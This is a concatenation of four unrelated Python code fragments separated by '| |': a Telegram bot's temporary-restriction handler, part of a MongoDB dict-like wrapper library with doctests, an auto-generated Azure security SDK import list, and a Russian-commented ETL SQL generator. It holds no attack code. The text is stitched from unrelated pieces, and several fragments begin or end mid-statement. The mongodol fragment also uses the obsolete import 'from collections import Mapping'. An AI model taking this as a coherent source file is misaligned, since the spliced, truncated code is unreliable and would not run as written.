reason = split_reason[1]
else:
reason = ""
mutetime = extract_time(message, time_val)
if not mutetime:
return ""
log = "<b>{}:</b>" \
"\n#TEMP RESTRICTED" \
"\n<b>• Admin:</b> {}" \
"\n<b>• User:</b> {}" \
"\n<b>• ID:</b> <code>{}</code>" \
"\n<b>• Time:</b> {}".format(html.escape(chat.title), mention_html(user.id, user.first_name),
mention_html(member.user.id, member.user.first_name), user_id, time_val)
if reason:
log += "\n<b>• Reason:</b> {}".format(reason)
try:
if member.can_send_messages is None or member.can_send_messages:
bot.restrict_chat_member(chat.id, user_id, until_date=mutetime, can_send_messages=True,
can_send_media_messages=False,
can_send_other_messages=False,
can_add_web_page_previews=False)
message.reply_text(tld(chat.id, "Restricted from sending media for {} | |
from functools import wraps, cached_property
from typing import Mapping, Optional, Union, Iterable
from collections.abc import KeysView, ValuesView, ItemsView
from collections import ChainMap
from pymongo import MongoClient
from dol import KvReader
from dol import Collection as DolCollection
from mongodol.constants import ID, PyMongoCollectionSpec, end_of_cursor, DFLT_TEST_DB
from mongodol.util import (
ProjectionSpec,
normalize_projection,
projection_union,
get_mongo_collection_pymongo_obj,
)
from collections import Mapping
from dol import KvReader
from collections import (
KeysView as BaseKeysView,
ValuesView as BaseValuesView,
ItemsView as BaseItemsView,
)
class BaseMapping:
# factories for mapping view objects
# that subclasses can replace
KeysView = BaseKeysView
ValuesView = BaseValuesView
ItemsView = BaseItemsView
def keys(self):
# each of these methods use the factory method on self,
# here that's self.KeysView(), and expect it to take specific arguments.
return self.KeysView(self)
def values(self):
return self.ValuesView(self)
def items(self):
return self.ItemsView(self)
class SpecialKeysView(BaseMapping.KeysView): # or SpecialKeysView(BaseKeysView)
def extra_method(self):
""""""
class SpecialMapping(BaseMapping):
KeysView = SpecialKeysView
# TODO: mgc type annotation
# See https://stackoverflow.com/questions/66464191/referencing-a-python-class-within-its-definition-but-outside-a-method
class MongoCollectionCollection(DolCollection):
def __init__(
self,
mgc: Union[PyMongoCollectionSpec, DolCollection] = None,
filter: Optional[dict] = None,
iter_projection: Optional[dict] = None,
**mgc_find_kwargs,
):
self.mgc = get_mongo_collection_pymongo_obj(mgc)
self.filter = filter or {}
self._iter_projection = iter_projection
self._mgc_find_kwargs = mgc_find_kwargs
def _merge_with_filt(self, m: Mapping) -> dict:
"""
:param args: dictionaries that are valid mongo queries
:return:
>>> class Mock(MongoCollectionCollection):
... def __init__(self, filter):
... self.filter = filter
>>> s = Mock(filter={'a': 3, 'b': {'$in': [1, 2, 3]}})
>>> s._merge_with_filt({'c': 'me'})
{'$and': [{'a': 3, 'b': {'$in': [1, 2, 3]}}, {'c': 'me'}]}
>>> s._merge_with_filt({'b': 4})
{'$and': [{'a': 3, 'b': {'$in': [1, 2, 3]}}, {'b': 4}]}
"""
# return {"$and": [self.filter, *args]} # in case we want to move to handling several elements to merge
return {'$and': [self.filter, m]}
def __iter__(self):
return self.mgc.find(
filter=self.filter,
projection=self._iter_projection,
**self._mgc_find_kwargs,
)
def __len__(self):
return self.mgc.count_documents(**self._count_kwargs)
def __contains__(self, k: dict):
cursor = self.mgc.find(self._merge_with_filt(k), projection=())
return next(cursor, end_of_cursor) is not end_of_cursor
@cached_property
def _count_kwargs(self):
search_map = ChainMap(self._mgc_find_kwargs, dict(filter=self.filter))
return {
x: search_map[x]
for x in ['filter', 'skip', 'limit', 'hint']
if x in search_map
}
@cached_property
def mgc_repr(self):
return f'<{self.mgc.database.name}/{self.mgc.name}>'
def __repr__(self):
return (
f'{type(self).__name__}(mgc={self.mgc_repr}, filter={self.filter}, iter_projection={self._iter_projection}'
f"{', '.join(f'{k}={v}' for k, v in self._mgc_find_kwargs.items())})"
)
class MongoValuesView(ValuesView):
def __contains__(self, v):
m = self._mapping
cursor = m.mgc.find(filter=m._merge_with_filt(v), projection=())
return next(cursor, end_of_cursor) is not end_of_cursor
def __iter__(self):
m = self._mapping
return m.mgc.find(filter=m.filter, projection=m._getitem_projection)
# def distinct(self, key, filter=None, **kwargs):
# m = self._mapping
# # TODO: Check if this is correct (what about $ cases?): filter=m._merge_with_filt(filter)
# return m.mgc.distinct(key, filter=m._merge_with_filt(filter), **kwargs)
#
# unique = distinct
class MongoItemsView(ItemsView):
def __contains__(self, item):
m = self._mapping
k, v = item
# TODO: How do we have cursor return no data (here still has _id)
cursor = m.mgc.find(filter=dict(v, **m._merge_with_filt(k)), projection=())
# return cursor
return next(cursor, end_of_cursor) is not end_of_cursor
def __iter__(self):
m = self._mapping
for doc in m.mgc.find(filter=m.filter, projection=m._items_projection):
key = {k: doc.pop(k) for k in m.key_fields}
yield key, doc
class MongoCollectionReader(MongoCollectionCollection, KvReader):
"""A base class to read from a mongo collection, or subset thereof, with the Mapping (i.e. dict-like) interface.
Some examples below. For examples using actual data (with setup and tear down) see the tests/ folder.
>>> from pymongo import MongoClient
>>> s = MongoCollectionReader(MongoClient()['mongodol']['mongodol_test'])
>>> list_of_keys = list(s)
>>> fake_key = {'_id': 'this key does not exist'}
>>> fake_key in s
False
It's important to note that ``s[k]`` (for any base MongoCollectionReader instance ``s``) returns a Cursor,
and will always return a Cursor, no matter what key ``k`` you ask for
-- as long as the key is a valid mapping (dict usually).
This cursor is a (pymongo) object that is used to iterate over the results of the ``k`` lookup.
It may yield no results what-so-ever, or one, or many.
>>> v = s[fake_key]
>>> type(v).__name__
'Cursor'
>>> len(list(v)) # but the cursor yields no results
0
Indeed, ``MongoCollectionReader`` is really meant to provide a low level key-value interface to a mongo collection
that is really meant to be wrapped in order to produce the actual key-value interfaces one needs.
You shouldn't think of it's instances as a normal dict where any request for the value under a key,
for a key that doesn't exist, will result in a ``KeyError``.
Note that this means that `s.get(k, default)` will never result in the default being returned,
since there are no missing keys here; only empty results (cursors that don't yield anything).
>>> v = s.get(fake_key, {'the': 'default'})
>>> assert v != {'the': 'default'}
``s.keys()``, ``s.values()``, and ``s.items()`` are ``collections.abc.MappingViews`` instances
(specialized for mongo).
>>> type(s.keys()).__name__
'KeysView'
>>> type(s.values()).__name__
'MongoValuesView'
>>> type(s.items()).__name__
'MongoItemsView'
Recall that ``collections.abc.MappingViews`` have many set-like functionalities:
>>> fake_key in s.keys()
False
>>> a_list_of_fake_keys = [{'_id': 'fake_key'}, {'_id': 'yet_another'}]
>>> s.keys().isdisjoint(a_list_of_fake_keys)
True
>>> s.keys() & a_list_of_fake_keys
set()
>>> fake_value = {'data': "this does not exist"}
>>> fake_value in s.values()
False
>>> fake_item = (fake_key, fake_value)
>>> fake_item in s.items()
False
Note though that since keys and values are both dictionaries in mongo, some of these set-like functionalities
might not work (complaints such as ``TypeError: unhashable type: 'dict'``),
such as:
>>> s.keys() | a_list_of_fake_keys
Traceback (most recent call last):
...
TypeError: unhashable type: 'dict'
But you can take care of that in higher level wrappers that have hashable keys and/or values.
"""
_projections_are_flattened = False
_wrap_for_method = {
'values': MongoValuesView,
'items': MongoItemsView,
}
def __init__(
self,
mgc: Union[PyMongoCollectionSpec, KvReader] = None,
filter: Optional[dict] = None,
iter_projection: ProjectionSpec = (ID,),
getitem_projection: ProjectionSpec = None,
**mgc_find_kwargs,
):
assert iter_projection is not None, 'iter_projection cannot be None'
super().__init__(
mgc=mgc, filter=filter, iter_projection=iter_projection, **mgc_find_kwargs,
)
self._getitem_projection = getitem_projection
def __getitem__(self, k):
assert isinstance(
k, Mapping
), f'k (key) must be a mapping (typically a dictionary). Was:\n\tk={k}'
return self.mgc.find(
filter=self._merge_with_filt(k), projection=self._getitem_projection,
)
def keys(self):
return KeysView(self)
def values(self) -> MongoValuesView:
return MongoValuesView(self)
@cached_property
def _items_projection(self):
return projection_union(
self._iter_projection,
self._getitem_projection,
already_flattened=self._projections_are_flattened,
)
@cached_property
def key_fields(self):
_iter_projection = normalize_projection(self._iter_projection)
return tuple(
field for field in _iter_projection if _iter_projection[field] is True
)
@cached_property
def val_fields(self):
if self._getitem_projection is None:
return None
else:
_getitem_projection = normalize_projection(self._getitem_projection)
return tuple(
field
for field in _getitem_projection
if _getitem_projection[field] is True
)
def items(self) -> MongoItemsView:
return MongoItemsView(self)
@classmethod
def from_params(
cls,
db_name: str = DFLT_TEST_DB,
collection_name: str = 'test',
mongo_client: Optional[dict] = None,
filter: Optional[dict] = None,
iter_projection: ProjectionSpec = (ID,),
getitem_projection: ProjectionSpec = None,
**mgc_find_kwargs,
):
if mongo_client is None:
mongo_client = MongoClient()
elif isinstance(mongo_client, dict):
mongo_client = MongoClient(**mongo_client)
return cls(
mgc=mongo_client[db_name][collection_name],
filter=filter,
iter_projection=iter_projection,
getitem_projection=getitem_projection,
**mgc_find_kwargs,
)
def distinct(self, key, filter=None, **kwargs):
# TODO: Check if this is correct (what about $ cases?): filter=m._merge_with_filt(filter)
return self.mgc.distinct(
key, filter=self._merge_with_filt(filter or {}), **kwargs
)
unique = distinct
class MongoCollectionFieldsReader(MongoCollectionReader):
"""A base class to read from a mongo collection, or subset thereof, with the Mapping (i.e. dict-like) interface.
An "easier" interface for the common case where we just want to specify fixed fields for keys and vals.
"""
_projections_are_flattened = True
def __init__(
self,
mgc: Union[PyMongoCollectionSpec, KvReader] = None,
filter: Optional[dict] = None,
key_fields: ProjectionSpec = (ID,),
val_fields: ProjectionSpec = None,
):
iter_projection = normalize_projection(key_fields)
super().__init__(
mgc=mgc,
filter=filter,
iter_projection=normalize_projection(key_fields),
getitem_projection=normalize_projection(val_fields),
)
self.key_fields = key_fields
self.val_fields = val_fields
class MongoCollectionPersister(MongoCollectionReader):
"""base class to read from and write to a mongo collection, or subset thereof, with the MutableMapping interface.
>>> from mongodol.util import mk_dflt_mgc
>>> mongo_collection_obj = mk_dflt_mgc()
>>> s = MongoCollectionPersister(mongo_collection_obj, getitem_projection={'_id': False})
>>> for k in s: # deleting all docs in default collection
... del s[k]
>>> k = {'_id': 'foo'}
>>> v = {'val': 'bar'}
>>> k in s # see that key is not in store (and testing __contains__)
False
>>> len(s)
0
>>> s[k] = v
>>> len(s)
1
>>> list(s)
[{'_id': 'foo'}]
Since this is a base mongo store, the values are cursors, so to get an actual value, you need to fetch the first doc
>>> next(s[k])
{'val': 'bar'}
>>> next(s.get(k))
{'val': 'bar'}
Remember (see ``MongoCollectionReader`` docs) that ``s.get`` will never reach its default since
the reader will always return a cursor (possibly empty).
So in the following case, we should get an empty cursor (not a default value)
| |
<reponame>ankitarorabit/azure-sdk-for-python
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import AadConnectivityState
from ._models_py3 import AadExternalSecuritySolution
from ._models_py3 import AadSolutionProperties
from ._models_py3 import ActiveConnectionsNotInAllowedRange
from ._models_py3 import AdaptiveApplicationControlGroup
from ._models_py3 import AdaptiveApplicationControlGroups
from ._models_py3 import AdaptiveApplicationControlIssueSummary
from ._models_py3 import AdaptiveNetworkHardening
from ._models_py3 import AdaptiveNetworkHardeningEnforceRequest
from ._models_py3 import AdaptiveNetworkHardeningsList
from ._models_py3 import AdditionalData
from ._models_py3 import AdvancedThreatProtectionSetting
from ._models_py3 import Alert
from ._models_py3 import AlertEntity
from ._models_py3 import AlertList
from ._models_py3 import AlertsSuppressionRule
from ._models_py3 import AlertsSuppressionRulesList
from ._models_py3 import AllowedConnectionsList
from ._models_py3 import AllowedConnectionsResource
from ._models_py3 import AllowlistCustomAlertRule
from ._models_py3 import AmqpC2DMessagesNotInAllowedRange
from ._models_py3 import AmqpC2DRejectedMessagesNotInAllowedRange
from ._models_py3 import AmqpD2CMessagesNotInAllowedRange
from ._models_py3 import AscLocation
from ._models_py3 import AscLocationList
from ._models_py3 import AssessmentLinks
from ._models_py3 import AssessmentStatus
from ._models_py3 import AtaExternalSecuritySolution
from ._models_py3 import AtaSolutionProperties
from ._models_py3 import AuthenticationDetailsProperties
from ._models_py3 import AutoProvisioningSetting
from ._models_py3 import AutoProvisioningSettingList
from ._models_py3 import Automation
from ._models_py3 import AutomationAction
from ._models_py3 import AutomationActionEventHub
from ._models_py3 import AutomationActionLogicApp
from ._models_py3 import AutomationActionWorkspace
from ._models_py3 import AutomationList
from ._models_py3 import AutomationRuleSet
from ._models_py3 import AutomationScope
from ._models_py3 import AutomationSource
from ._models_py3 import AutomationTriggeringRule
from ._models_py3 import AutomationValidationStatus
from ._models_py3 import AwAssumeRoleAuthenticationDetailsProperties
from ._models_py3 import AwsCredsAuthenticationDetailsProperties
from ._models_py3 import AzureResourceDetails
from ._models_py3 import AzureResourceIdentifier
from ._models_py3 import AzureResourceLink
from ._models_py3 import AzureTrackedResourceLocation
from ._models_py3 import Baseline
from ._models_py3 import BaselineAdjustedResult
from ._models_py3 import BenchmarkReference
from ._models_py3 import CVE
from ._models_py3 import CVSS
from ._models_py3 import CefExternalSecuritySolution
from ._models_py3 import CefSolutionProperties
from ._models_py3 import Compliance
from ._models_py3 import ComplianceList
from ._models_py3 import ComplianceResult
from ._models_py3 import ComplianceResultList
from ._models_py3 import ComplianceSegment
from ._models_py3 import ConnectableResource
from ._models_py3 import ConnectedResource
from ._models_py3 import ConnectedWorkspace
from ._models_py3 import ConnectionToIpNotAllowed
from ._models_py3 import ConnectorSetting
from ._models_py3 import ConnectorSettingList
from ._models_py3 import ContainerRegistryVulnerabilityProperties
from ._models_py3 import CustomAlertRule
from ._models_py3 import DataExportSettings
from ._models_py3 import DenylistCustomAlertRule
from ._models_py3 import Device
from ._models_py3 import DeviceList
from ._models_py3 import DeviceSecurityGroup
from ._models_py3 import DeviceSecurityGroupList
from ._models_py3 import DirectMethodInvokesNotInAllowedRange
from ._models_py3 import DiscoveredSecuritySolution
from ._models_py3 import DiscoveredSecuritySolutionList
from ._models_py3 import ETag
from ._models_py3 import EffectiveNetworkSecurityGroups
from ._models_py3 import ExternalSecuritySolution
from ._models_py3 import ExternalSecuritySolutionKind
from ._models_py3 import ExternalSecuritySolutionList
from ._models_py3 import ExternalSecuritySolutionProperties
from ._models_py3 import FailedLocalLoginsNotInAllowedRange
from ._models_py3 import FileUploadsNotInAllowedRange
from ._models_py3 import Firmware
from ._models_py3 import GcpCredentialsDetailsProperties
from ._models_py3 import HttpC2DMessagesNotInAllowedRange
from ._models_py3 import HttpC2DRejectedMessagesNotInAllowedRange
from ._models_py3 import HttpD2CMessagesNotInAllowedRange
from ._models_py3 import HybridComputeSettingsProperties
from ._models_py3 import InformationProtectionKeyword
from ._models_py3 import InformationProtectionPolicy
from ._models_py3 import InformationProtectionPolicyList
from ._models_py3 import InformationType
from ._models_py3 import IoTSecurityAggregatedAlert
from ._models_py3 import IoTSecurityAggregatedAlertList
from ._models_py3 import IoTSecurityAggregatedAlertPropertiesTopDevicesListItem
from ._models_py3 import IoTSecurityAggregatedRecommendation
from ._models_py3 import IoTSecurityAggregatedRecommendationList
from ._models_py3 import IoTSecurityAlertedDevice
from ._models_py3 import IoTSecurityDeviceAlert
from ._models_py3 import IoTSecurityDeviceRecommendation
from ._models_py3 import IoTSecuritySolutionAnalyticsModel
from ._models_py3 import IoTSecuritySolutionAnalyticsModelList
from ._models_py3 import IoTSecuritySolutionAnalyticsModelPropertiesDevicesMetricsItem
from ._models_py3 import IoTSecuritySolutionModel
from ._models_py3 import IoTSecuritySolutionsList
from ._models_py3 import IoTSeverityMetrics
from ._models_py3 import IotAlert
from ._models_py3 import IotAlertList
from ._models_py3 import IotAlertListModel
from ._models_py3 import IotAlertModel
from ._models_py3 import IotAlertType
from ._models_py3 import IotAlertTypeList
from ._models_py3 import IotDefenderSettingsList
from ._models_py3 import IotDefenderSettingsModel
from ._models_py3 import IotRecommendation
from ._models_py3 import IotRecommendationList
from ._models_py3 import IotRecommendationListModel
from ._models_py3 import IotRecommendationModel
from ._models_py3 import IotRecommendationType
from ._models_py3 import IotRecommendationTypeList
from ._models_py3 import IotSensorsList
from ._models_py3 import IotSensorsModel
from ._models_py3 import IotSitesList
from ._models_py3 import IotSitesModel
from ._models_py3 import IpAddress
from ._models_py3 import JitNetworkAccessPoliciesList
from ._models_py3 import JitNetworkAccessPolicy
from ._models_py3 import JitNetworkAccessPolicyInitiatePort
from ._models_py3 import JitNetworkAccessPolicyInitiateRequest
from ._models_py3 import JitNetworkAccessPolicyInitiateVirtualMachine
from ._models_py3 import JitNetworkAccessPolicyVirtualMachine
from ._models_py3 import JitNetworkAccessPortRule
from ._models_py3 import JitNetworkAccessRequest
from ._models_py3 import JitNetworkAccessRequestPort
from ._models_py3 import JitNetworkAccessRequestVirtualMachine
from ._models_py3 import Kind
from ._models_py3 import ListCustomAlertRule
from ._models_py3 import LocalUserNotAllowed
from ._models_py3 import Location
from ._models_py3 import LogAnalyticsIdentifier
from ._models_py3 import MacAddress
from ._models_py3 import MqttC2DMessagesNotInAllowedRange
from ._models_py3 import MqttC2DRejectedMessagesNotInAllowedRange
from ._models_py3 import MqttD2CMessagesNotInAllowedRange
from ._models_py3 import NetworkInterface
from ._models_py3 import OnPremiseIotSensor
from ._models_py3 import OnPremiseIotSensorsList
from ._models_py3 import OnPremiseResourceDetails
from ._models_py3 import OnPremiseSqlResourceDetails
from ._models_py3 import Operation
from ._models_py3 import OperationDisplay
from ._models_py3 import OperationList
from ._models_py3 import PackageDownloadInfo
from ._models_py3 import PackageDownloads
from ._models_py3 import PackageDownloadsCentralManager
from ._models_py3 import PackageDownloadsCentralManagerFull
from ._models_py3 import PackageDownloadsCentralManagerFullOvf
from ._models_py3 import PackageDownloadsSensor
from ._models_py3 import PackageDownloadsSensorFull
from ._models_py3 import PackageDownloadsSensorFullOvf
from ._models_py3 import PathRecommendation
from ._models_py3 import Pricing
from ._models_py3 import PricingList
from ._models_py3 import ProcessNotAllowed
from ._models_py3 import ProtectionMode
from ._models_py3 import Protocol
from ._models_py3 import ProxyServerProperties
from ._models_py3 import PublisherInfo
from ._models_py3 import QueryCheck
from ._models_py3 import QueuePurgesNotInAllowedRange
from ._models_py3 import RecommendationConfigurationProperties
from ._models_py3 import RegulatoryComplianceAssessment
from ._models_py3 import RegulatoryComplianceAssessmentList
from ._models_py3 import RegulatoryComplianceControl
from ._models_py3 import RegulatoryComplianceControlList
from ._models_py3 import RegulatoryComplianceStandard
from ._models_py3 import RegulatoryComplianceStandardList
from ._models_py3 import Remediation
from ._models_py3 import ResetPasswordInput
from ._models_py3 import Resource
from ._models_py3 import ResourceDetails
from ._models_py3 import ResourceIdentifier
from ._models_py3 import Rule
from ._models_py3 import RuleResults
from ._models_py3 import RuleResultsInput
from ._models_py3 import RuleResultsProperties
from ._models_py3 import RulesResults
from ._models_py3 import RulesResultsInput
from ._models_py3 import Scan
from ._models_py3 import ScanProperties
from ._models_py3 import ScanResult
from ._models_py3 import ScanResultProperties
from ._models_py3 import ScanResults
from ._models_py3 import Scans
from ._models_py3 import ScopeElement
from ._models_py3 import SecureScoreControlDefinitionItem
from ._models_py3 import SecureScoreControlDefinitionList
from ._models_py3 import SecureScoreControlDefinitionSource
from ._models_py3 import SecureScoreControlDetails
from ._models_py3 import SecureScoreControlList
from ._models_py3 import SecureScoreControlScore
from ._models_py3 import SecureScoreItem
from ._models_py3 import SecureScoresList
from ._models_py3 import SecurityAssessment
from ._models_py3 import SecurityAssessmentList
from ._models_py3 import SecurityAssessmentMetadata
from ._models_py3 import SecurityAssessmentMetadataList
from ._models_py3 import SecurityAssessmentMetadataPartnerData
from ._models_py3 import SecurityAssessmentMetadataProperties
from ._models_py3 import SecurityAssessmentPartnerData
from ._models_py3 import SecurityContact
from ._models_py3 import SecurityContactList
from ._models_py3 import SecuritySolution
from ._models_py3 import SecuritySolutionList
from ._models_py3 import SecuritySolutionsReferenceData
from ._models_py3 import SecuritySolutionsReferenceDataList
from ._models_py3 import SecuritySubAssessment
from ._models_py3 import SecuritySubAssessmentList
from ._models_py3 import SecurityTask
from ._models_py3 import SecurityTaskList
from ._models_py3 import SecurityTaskParameters
from ._models_py3 import SensitivityLabel
from ._models_py3 import Sensor
from ._models_py3 import ServerVulnerabilityAssessment
from ._models_py3 import ServerVulnerabilityAssessmentsList
from ._models_py3 import ServerVulnerabilityProperties
from ._models_py3 import ServicePrincipalProperties
from ._models_py3 import Setting
from ._models_py3 import SettingsList
from ._models_py3 import Site
from ._models_py3 import SqlServerVulnerabilityProperties
from ._models_py3 import SubAssessmentStatus
from ._models_py3 import SuppressionAlertsScope
from ._models_py3 import Tags
from ._models_py3 import TagsResource
from ._models_py3 import ThresholdCustomAlertRule
from ._models_py3 import TimeWindowCustomAlertRule
from ._models_py3 import TopologyList
from ._models_py3 import TopologyResource
from ._models_py3 import TopologySingleResource
from ._models_py3 import TopologySingleResourceChild
from ._models_py3 import TopologySingleResourceParent
from ._models_py3 import TrackedResource
from ._models_py3 import TwinUpdatesNotInAllowedRange
from ._models_py3 import UnauthorizedOperationsNotInAllowedRange
from ._models_py3 import UpdateIotSecuritySolutionData
from ._models_py3 import UpgradePackageDownloadInfo
from ._models_py3 import UserDefinedResourcesProperties
from ._models_py3 import UserRecommendation
from ._models_py3 import VaRule
from ._models_py3 import VendorReference
from ._models_py3 import VmRecommendation
from ._models_py3 import WorkspaceSetting
from ._models_py3 import WorkspaceSettingList
except (SyntaxError, ImportError):
from ._models import AadConnectivityState # type: ignore
from ._models import AadExternalSecuritySolution # type: ignore
from ._models import AadSolutionProperties # type: ignore
from ._models import ActiveConnectionsNotInAllowedRange # type: ignore
from ._models import AdaptiveApplicationControlGroup # type: ignore
from ._models import AdaptiveApplicationControlGroups # type: ignore
from ._models import AdaptiveApplicationControlIssueSummary # type: ignore
from ._models import AdaptiveNetworkHardening # type: ignore
from ._models import AdaptiveNetworkHardeningEnforceRequest # type: ignore
from ._models import AdaptiveNetworkHardeningsList # type: ignore
from ._models import AdditionalData # type: ignore
from ._models import AdvancedThreatProtectionSetting # type: ignore
from ._models import Alert # type: ignore
from ._models import AlertEntity # type: ignore
from ._models import AlertList # type: ignore
from ._models import AlertsSuppressionRule # type: ignore
from ._models import AlertsSuppressionRulesList # type: ignore
from ._models import AllowedConnectionsList # type: ignore
from ._models import AllowedConnectionsResource # type: ignore
from ._models import AllowlistCustomAlertRule # type: ignore
from ._models import AmqpC2DMessagesNotInAllowedRange # type: ignore
from ._models import AmqpC2DRejectedMessagesNotInAllowedRange # type: ignore
from ._models import AmqpD2CMessagesNotInAllowedRange # type: ignore
from ._models import AscLocation # type: ignore
from ._models import AscLocationList # type: ignore
from ._models import AssessmentLinks # type: ignore
from ._models import AssessmentStatus # type: ignore
from ._models import AtaExternalSecuritySolution # type: ignore
from ._models import | |
имени
l_table_name=p_table.queue_name
else:
l_table_name=p_table.name
l_schema=C_SCHEMA_TABLE_TYPE.get(p_table.type,None) # схема таблицы
l_sql="DROP VIEW IF EXISTS "+l_schema+"."+'"'+l_table_name+'";'
return l_sql
def get_source_table_delete_sql(p_source_table: object):
"""
SQL-запрос удаления строк из таблицы источника
:param p_source_table: объект класса SourceTable
"""
l_sql=Connection().dbms.get_source_table_delete_sql(p_source_table_id=str(p_source_table.id))
return l_sql
def get_source_table_etl(p_source_table: object, p_attribute_value: str =None):
"""
ETL таблицы источника
:param p_source_table: объект класса SourceTable
:param p_etl: id etl процесса
:param p_attribute_value: значения атрибутов, полученные с источника и преобразованные для вставки
"""
l_attribute_name_list=[]
l_update_attribute_sql=""
l_etl_update_sql=""
for i_attribute in _get_table_attribute_property(p_table=p_source_table):
if i_attribute.attribute_type not in ( # атрибуты etl и update добавляются в конец
[
C_ETL_ATTR,
C_UPDATE
]
):
l_attribute_name_list.append(i_attribute.name)
elif i_attribute.attribute_type==C_UPDATE:
l_update_attribute_sql='"'+str(i_attribute.id)+'"'
# elif i_attribute.attribute_type==C_ETL_ATTR:
# l_etl_update_sql='"'+str(i_attribute.id)+'"' # временно отказываемся от данного атрибута
l_attribute_name_list.sort() # сортируем по наименованию
# сортируем id в соответствии с наименованием атрибутов
l_attribute_sql="\n\t\t"
for i_attribute_name in l_attribute_name_list:
for i_attribute in _get_table_attribute_property(p_table=p_source_table):
if i_attribute.name==i_attribute_name:
l_attribute_sql=l_attribute_sql+'"'+str(i_attribute.id)+'"'+",\n\t\t"
l_attribute_sql=l_attribute_sql+l_update_attribute_sql#",\n\t\t"+l_etl_update_sql+"\n\t"
l_etl=Connection().dbms.get_source_table_etl(
p_source_table_id=p_source_table.id,
p_source_attribute=l_attribute_sql,
p_source_attribute_value=p_attribute_value or "%s"
)
return l_etl
def get_idmap_etl(
p_idmap: object,
p_etl_id: str,
p_source_table: object =None
):
"""
Генерирует скрипт ETL для таблицы Idmap
:param p_idmap: объект класса Idmap
:param p_etl_id: id etl процесса
:param p_source_table: таблица источник, которую требуется загрузить в idmap
(если не указана, возвращается лист с etl всех таблиц источников)
"""
l_source_table_id=None
if p_source_table:
l_source_table_id=p_source_table.id
l_etl=[]
l_idmap_nk_column=None
l_idmap_rk_column=None
l_etl_column=None
for i_attribute in _get_table_attribute_property(p_table=p_idmap):
if i_attribute.attribute_type==C_RK:
l_idmap_rk_column=i_attribute.id
if i_attribute.attribute_type==C_NK:
l_idmap_nk_column=i_attribute.id
if i_attribute.attribute_type==C_ETL_ATTR:
l_etl_column=i_attribute.id
for i_source_table in p_idmap.entity.source_table:
if l_source_table_id and l_source_table_id!=i_source_table.id: # пропускаем таблицу источник, если не она указана
continue
l_column_nk_sql=""
# формируем скрипт для конкатенации натуральных ключей
# сортируем список натуральных ключей по наименованию
l_source_attribute_nk=sorted(p_idmap.source_attribute_nk, key=lambda nk: nk.name)
for i_column_nk in l_source_attribute_nk:
if i_source_table.id==i_column_nk.source_table.id:
l_column_nk_sql=l_column_nk_sql+"CAST("+'"'+str(i_column_nk.id)+'"'+" AS VARCHAR(4000))\n\t\t||'@@'||\n\t\t"
l_column_nk_sql=l_column_nk_sql[:-14]
l_source_id=i_source_table.source.source_id
# генерируем etl для каждой таблицы источника
l_etl.append(
Connection().dbms.get_idmap_etl(
p_idmap_id=p_idmap.id,
p_idmap_rk_id=l_idmap_rk_column,
p_idmap_nk_id=l_idmap_nk_column,
p_etl_id=l_etl_column,
p_etl_value=p_etl_id,
p_source_table_id=i_source_table.id,
p_attribute_nk=l_column_nk_sql,
p_source_id=l_source_id,
p_max_rk=str(p_idmap.max_rk)
)
)
return l_etl
def get_anchor_etl(
p_anchor: object,
p_etl_id: str
):
"""
Генерирует ETL для якорной таблицы
:param p_anchor: объект класса Anchor
:param p_etl_id: id etl процесса
"""
l_anchor_rk_id=None
l_anchor_source_id=None
l_anchor_etl_id=None
l_idmap_rk_id=None
l_idmap_nk_id=None
for i_attribute in _get_table_attribute_property(p_table=p_anchor):
if i_attribute.attribute_type==C_RK:
l_anchor_rk_id=i_attribute.id
if i_attribute.attribute_type==C_SOURCE_ATTR:
l_anchor_source_id=i_attribute.id
if i_attribute.attribute_type==C_ETL_ATTR:
l_anchor_etl_id=i_attribute.id
for i_attribute in p_anchor.entity.idmap.idmap_attribute:
if i_attribute.attribute_type==C_RK:
l_idmap_rk_id=i_attribute.id
if i_attribute.attribute_type==C_NK:
l_idmap_nk_id=i_attribute.id
return Connection().dbms.get_anchor_etl(
p_anchor_id=p_anchor.id,
p_anchor_rk_id=l_anchor_rk_id,
p_anchor_source_id=l_anchor_source_id,
p_anchor_etl_id=l_anchor_etl_id,
p_idmap_id=p_anchor.entity.idmap.id,
p_idmap_rk_id=l_idmap_rk_id,
p_idmap_nk_id=l_idmap_nk_id,
p_etl_value=p_etl_id
)
def get_attribute_etl(p_attribute_table: object, p_etl_id: str, p_source_table: object =None):
"""
Генерирует etl скрипт для таблицы attribute
:param p_attribute_table: объект класса AttributeTable
:param p_etl_id: id etl процесса
:param p_source_table: таблица источник, которую требуется загрузить в attribute
(если не указана, возвращается лист с etl всех таблиц источников)
"""
l_etl=[]
l_source_table_id=None
if p_source_table:
l_source_table_id=p_source_table.id
l_attribute_rk_id=None
l_attribute_column_id=None
l_from_dttm_id=None
l_to_dttm_id=None
l_etl_id=None
l_idmap_rk_id=None
l_idmap_nk_id=None
l_column_value_datatype=None
for i_attribute in _get_table_attribute_property(p_table=p_attribute_table):
if i_attribute.attribute_type==C_RK:
l_attribute_rk_id=i_attribute.id
if i_attribute.attribute_type==C_VALUE:
l_attribute_column_id=i_attribute.id
l_column_value_datatype=i_attribute.datatype.data_type_sql
if i_attribute.attribute_type==C_FROM:
l_from_dttm_id=i_attribute.id
if i_attribute.attribute_type==C_TO:
l_to_dttm_id=i_attribute.id
if i_attribute.attribute_type==C_ETL_ATTR:
l_etl_id=i_attribute.id
for i_attribute in p_attribute_table.entity.idmap.idmap_attribute:
if i_attribute.attribute_type==C_RK:
l_idmap_rk_id=i_attribute.id
if i_attribute.attribute_type==C_NK:
l_idmap_nk_id=i_attribute.id
for i_source_attribute in p_attribute_table.entity_attribute.source_attribute:
if l_source_table_id and l_source_table_id!=i_source_attribute.source_table.id: # пропускаем таблицу источник, если не она указана
continue
l_column_nk_sql=""
l_source_attribute_nk=sorted(p_attribute_table.entity.idmap.source_attribute_nk, key=lambda nk: nk.name)
for i_column_nk in l_source_attribute_nk:
if i_source_attribute.source_table.id==i_column_nk.source_table.id:
l_column_nk_sql=l_column_nk_sql+"CAST("+'"'+str(i_column_nk.id)+'"'+" AS VARCHAR(4000))\n\t\t||'@@'||\n\t\t"
l_column_value_id=i_source_attribute.id
l_update_timestamp_id=None
for i_source_attribute_all in i_source_attribute.source_table.source_attribute:
if i_source_attribute_all.attribute_type==C_UPDATE:
l_update_timestamp_id=i_source_attribute_all.id
l_column_nk_sql=l_column_nk_sql[:-14]
